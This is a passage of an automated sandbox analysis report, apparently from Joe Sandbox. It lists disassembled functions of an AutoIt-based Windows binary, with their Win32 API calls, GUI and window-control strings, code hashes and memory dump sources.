                          • Opcode ID: 964b2a24bdb64374933e6affaa4be2bbe6ec498714e35ed363652e4b4e253533
                          • Instruction ID: 7cda31c9117d6252f0761a8c4cbb616a0e4c2e2af487bd730d12e78568523bc2
                          • Opcode Fuzzy Hash: 964b2a24bdb64374933e6affaa4be2bbe6ec498714e35ed363652e4b4e253533
                          • Instruction Fuzzy Hash: 0451B830244301ABCA10DF14C8D1979BBE1FB64B04F564AD9F466A72E5DBB0DF45E742
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B0C714 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 245COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: __wcsnicmp
                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                          • API String ID: 1038674560-86951937
                          • Opcode ID: bc1f35499c93a502ecd8512e6574306fe035823e1630c305460784857d0ebb39
                          • Instruction ID: 993fd4997b91b3bb3499a05f2740a1183190ea898b70662cdbfddddc2550ccad
                          • Opcode Fuzzy Hash: bc1f35499c93a502ecd8512e6574306fe035823e1630c305460784857d0ebb39
                          • Instruction Fuzzy Hash: 52615931600312B7DB21BB249C82FBA3BE8EF15740F1441F4FD59EA2D2EB64DA41D6A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B048C8 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 491windowCOMMON
                          Download Yara Rule
                          APIs
                          • DestroyWindow.USER32 ref: 00B04956
                          • DeleteObject.GDI32(00000000), ref: 00B04998
                          • DeleteObject.GDI32(00000000), ref: 00B049A3
                          • DestroyCursor.USER32(00000000), ref: 00B049AE
                          • DestroyWindow.USER32(00000000), ref: 00B049B9
                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00B7E179
                          • 6F570200.COMCTL32(?,000000FF,?), ref: 00B7E1B2
                          • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00B7E5E0
                            • Part of subcall function 00B049CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B04954,00000000), ref: 00B04A23
                          • SendMessageW.USER32 ref: 00B7E627
                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B7E63E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: DestroyMessageSendWindow$DeleteObject$CursorF570200InvalidateMoveRect
                          • String ID: 0
                          • API String ID: 2008601239-4108050209
                          • Opcode ID: f3ac35ba6b43c6bd89ec22efbd0dc66bbf8945569b95841882acab495bd58a41
                          • Instruction ID: b497e20cafe61af0d9f2f28fe86fd83dcc7e70825a3c9c45763ec73cd399b560
                          • Opcode Fuzzy Hash: f3ac35ba6b43c6bd89ec22efbd0dc66bbf8945569b95841882acab495bd58a41
                          • Instruction Fuzzy Hash: B5128D706002019FDB25DF24C888BAABBE5FF59304F5485E9F5A9DB2A2C731E845CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B66189 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                          Download Yara Rule
                          APIs
                          • CharUpperBuffW.USER32(?,?,00B9DBF0), ref: 00B66245
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: BuffCharUpper
                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                          • API String ID: 3964851224-45149045
                          • Opcode ID: 2d1fc69e25597a0eaeab7652f587e7385f7ea277a8da762f043c7638e5d405a4
                          • Instruction ID: 2fc8eab01f3e3081b56f0835d2b45cf243e5d19564bcc2a0c00f6f671b8b6147
                          • Opcode Fuzzy Hash: 2d1fc69e25597a0eaeab7652f587e7385f7ea277a8da762f043c7638e5d405a4
                          • Instruction Fuzzy Hash: F1C15F34204201CBCB04EF54C491ABE7BD6AF94354F5448E9B8865B3A7DF35ED4ACB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6D385 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetSysColor.USER32(00000012), ref: 00B6D3BE
                          • SetTextColor.GDI32(?,?), ref: 00B6D3C2
                          • GetSysColorBrush.USER32(0000000F), ref: 00B6D3D8
                          • GetSysColor.USER32(0000000F), ref: 00B6D3E3
                          • CreateSolidBrush.GDI32(?), ref: 00B6D3E8
                          • GetSysColor.USER32(00000011), ref: 00B6D400
                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B6D40E
                          • SelectObject.GDI32(?,00000000), ref: 00B6D41F
                          • SetBkColor.GDI32(?,00000000), ref: 00B6D428
                          • SelectObject.GDI32(?,?), ref: 00B6D435
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00B6D454
                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B6D46B
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00B6D480
                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B6D4A8
                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00B6D4CF
                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00B6D4ED
                          • DrawFocusRect.USER32(?,?), ref: 00B6D4F8
                          • GetSysColor.USER32(00000011), ref: 00B6D506
                          • SetTextColor.GDI32(?,00000000), ref: 00B6D50E
                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00B6D522
                          • SelectObject.GDI32(?,00B6D0B5), ref: 00B6D539
                          • DeleteObject.GDI32(?), ref: 00B6D544
                          • SelectObject.GDI32(?,?), ref: 00B6D54A
                          • DeleteObject.GDI32(?), ref: 00B6D54F
                          • SetTextColor.GDI32(?,?), ref: 00B6D555
                          • SetBkColor.GDI32(?,?), ref: 00B6D55F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                          • String ID:
                          • API String ID: 1996641542-0
                          • Opcode ID: 2db2aa94e582e32e231152b386703f52005d27cc1739ec61e429d53f579e2e85
                          • Instruction ID: af0d099aebb7456a92c4abe7ee0f7f64180d068e912410c1a2330602bd2d3e1d
                          • Opcode Fuzzy Hash: 2db2aa94e582e32e231152b386703f52005d27cc1739ec61e429d53f579e2e85
                          • Instruction Fuzzy Hash: DE510B71900218AFDF10AFA4DC88EAE7BB9FF48320F114556F915AB2E1DB759D40DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6B4D4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00B6B5C0
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B6B5D1
                          • CharNextW.USER32(0000014E), ref: 00B6B600
                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00B6B641
                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00B6B657
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B6B668
                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00B6B685
                          • SetWindowTextW.USER32(?,0000014E), ref: 00B6B6D7
                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00B6B6ED
                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B6B71E
                          • _memset.LIBCMT ref: 00B6B743
                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00B6B78C
                          • _memset.LIBCMT ref: 00B6B7EB
                          • SendMessageW.USER32 ref: 00B6B815
                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00B6B86D
                          • SendMessageW.USER32(?,0000133D,?,?), ref: 00B6B91A
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00B6B93C
                          • GetMenuItemInfoW.USER32(?), ref: 00B6B986
                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B6B9B3
                          • DrawMenuBar.USER32(?), ref: 00B6B9C2
                          • SetWindowTextW.USER32(?,0000014E), ref: 00B6B9EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                          • String ID: 0
                          • API String ID: 1073566785-4108050209
                          • Opcode ID: a75416766fe3062caf6e697284a59880ad8c4de922fd234908d66616ed755263
                          • Instruction ID: 1b02a6b2df049556e7fe93b8047a6368674b2e0c5e14d5f3dc42a362fcf1a9d3
                          • Opcode Fuzzy Hash: a75416766fe3062caf6e697284a59880ad8c4de922fd234908d66616ed755263
                          • Instruction Fuzzy Hash: 97E15B71900218ABDF219F94CC84EEE7BF8EF15714F108196F919EB291DB788A81DF60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6744C Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetCursorPos.USER32(?), ref: 00B67587
                          • GetDesktopWindow.USER32 ref: 00B6759C
                          • GetWindowRect.USER32(00000000), ref: 00B675A3
                          • GetWindowLongW.USER32(?,000000F0), ref: 00B67605
                          • DestroyWindow.USER32(?), ref: 00B67631
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B6765A
                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B67678
                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00B6769E
                          • SendMessageW.USER32(?,00000421,?,?), ref: 00B676B3
                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00B676C6
                          • IsWindowVisible.USER32(?), ref: 00B676E6
                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00B67701
                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00B67715
                          • GetWindowRect.USER32(?,?), ref: 00B6772D
                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00B67753
                          • GetMonitorInfoW.USER32 ref: 00B6776D
                          • CopyRect.USER32(?,?), ref: 00B67784
                          • SendMessageW.USER32(?,00000412,00000000), ref: 00B677EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                          • String ID: ($0$tooltips_class32
                          • API String ID: 698492251-4156429822
                          • Opcode ID: 4ab9163aacf5c7f325a157b4b650a3e412f6d50f74d90801de826c963b257383
                          • Instruction ID: 11a6be2d878ec8a1e468623f6b224977a2816edefcf2fc24a76902584ed6f09a
                          • Opcode Fuzzy Hash: 4ab9163aacf5c7f325a157b4b650a3e412f6d50f74d90801de826c963b257383
                          • Instruction Fuzzy Hash: D5B1AF71608301AFDB04DF64C988B6ABBE5FF88314F008A9DF5999B291DB74EC04CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1A756 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B1A839
                          • GetSystemMetrics.USER32(00000007), ref: 00B1A841
                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B1A86C
                          • GetSystemMetrics.USER32(00000008), ref: 00B1A874
                          • GetSystemMetrics.USER32(00000004), ref: 00B1A899
                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00B1A8B6
                          • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00B1A8C6
                          • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00B1A8F9
                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00B1A90D
                          • GetClientRect.USER32(00000000,000000FF), ref: 00B1A92B
                          • GetStockObject.GDI32(00000011), ref: 00B1A947
                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B1A952
                            • Part of subcall function 00B1B736: GetCursorPos.USER32(000000FF), ref: 00B1B749
                            • Part of subcall function 00B1B736: ScreenToClient.USER32(00000000,000000FF), ref: 00B1B766
                            • Part of subcall function 00B1B736: GetAsyncKeyState.USER32(00000001), ref: 00B1B78B
                            • Part of subcall function 00B1B736: GetAsyncKeyState.USER32(00000002), ref: 00B1B799
                          • SetTimer.USER32(00000000,00000000,00000028,00B1ACEE), ref: 00B1A979
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                          • String ID: AutoIt v3 GUI
                          • API String ID: 1458621304-248962490
                          • Opcode ID: b17531c6a5d1fe61feab86945b9dd437c827b5d276a3d1653d4ab66fdb6ba274
                          • Instruction ID: 4405a1a9e85c5e4d33be74f0729b96e7674e4a6ba594df023ae0ddd8117b4682
                          • Opcode Fuzzy Hash: b17531c6a5d1fe61feab86945b9dd437c827b5d276a3d1653d4ab66fdb6ba274
                          • Instruction Fuzzy Hash: 84B13A71A0120AAFDB14DFA8DC85BE97BF4FB08314F51426AFA15A72E0DB74E841CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B669C5 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                          Download Yara Rule
                          APIs
                          • CharUpperBuffW.USER32(?,?), ref: 00B66A52
                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00B66B12
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: BuffCharMessageSendUpper
                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                          • API String ID: 3974292440-719923060
                          • Opcode ID: 14ffe7dca63126c29986f86b94f9f0d3ac5e0ba54c02667bac26c072c53a21ea
                          • Instruction ID: d609acdd89820ed70a72155c3d8eb283442ff5204b1baed1c14e8dac09f0d172
                          • Opcode Fuzzy Hash: 14ffe7dca63126c29986f86b94f9f0d3ac5e0ba54c02667bac26c072c53a21ea
                          • Instruction Fuzzy Hash: E3A16F302146019FCB04EF14C991ABAB7E5FF84314F5489E9B896AB3D2DB74ED09CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3DD46 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetClassNameW.USER32(?,?,00000100), ref: 00B3DD87
                          • __swprintf.LIBCMT ref: 00B3DE28
                          • _wcscmp.LIBCMT ref: 00B3DE3B
                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00B3DE90
                          • _wcscmp.LIBCMT ref: 00B3DECC
                          • GetClassNameW.USER32(?,?,00000400), ref: 00B3DF03
                          • GetDlgCtrlID.USER32(?), ref: 00B3DF55
                          • GetWindowRect.USER32(?,?), ref: 00B3DF8B
                          • GetParent.USER32(?), ref: 00B3DFA9
                          • ScreenToClient.USER32(00000000), ref: 00B3DFB0
                          • GetClassNameW.USER32(?,?,00000100), ref: 00B3E02A
                          • _wcscmp.LIBCMT ref: 00B3E03E
                          • GetWindowTextW.USER32(?,?,00000400), ref: 00B3E064
                          • _wcscmp.LIBCMT ref: 00B3E078
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                          • String ID: %s%u
                          • API String ID: 3119225716-679674701
                          • Opcode ID: 27e120162a7e5d1745d47f90a2b184fb101a874dee6210eae259d685c5c246b0
                          • Instruction ID: c883f547e62e43a961a6f24461266ea932e3c6a8e440ce5025fd1fae3ee90dc5
                          • Opcode Fuzzy Hash: 27e120162a7e5d1745d47f90a2b184fb101a874dee6210eae259d685c5c246b0
                          • Instruction Fuzzy Hash: 26A1C371204306AFDB18DF64D885FAAB7E9FF44310F20856AF9A9C7190DB30EA45CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3E69D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                          Download Yara Rule
                          APIs
                          • GetClassNameW.USER32(00000008,?,00000400), ref: 00B3E6E1
                          • _wcscmp.LIBCMT ref: 00B3E6F2
                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 00B3E71A
                          • CharUpperBuffW.USER32(?,00000000), ref: 00B3E737
                          • _wcscmp.LIBCMT ref: 00B3E755
                          • _wcsstr.LIBCMT ref: 00B3E766
                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00B3E79E
                          • _wcscmp.LIBCMT ref: 00B3E7AE
                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 00B3E7D5
                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00B3E81E
                          • _wcscmp.LIBCMT ref: 00B3E82E
                          • GetClassNameW.USER32(00000010,?,00000400), ref: 00B3E856
                          • GetWindowRect.USER32(00000004,?), ref: 00B3E8BF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                          • String ID: @$ThumbnailClass
                          • API String ID: 1788623398-1539354611
                          • Opcode ID: f20848b5b31d376e245b5ec52f4f53439c93d5d45d0e1932b8ecf241a9c6e5cf
                          • Instruction ID: bd99a582b32ffc4367e66a573f0499b0057730a3e30f0965f016246e2a5f9952
                          • Opcode Fuzzy Hash: f20848b5b31d376e245b5ec52f4f53439c93d5d45d0e1932b8ecf241a9c6e5cf
                          • Instruction Fuzzy Hash: 4A819F310082099BDB15CF14D885FAA7BE8FF54714F2485ABFDA99A0D1DB30ED46CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3E4EA Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: __wcsnicmp
                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                          • API String ID: 1038674560-1810252412
                          • Opcode ID: 36ca81ec0bd1979f69d1ffc4241cdc1e182b57a91160cc26f69f321af25696d7
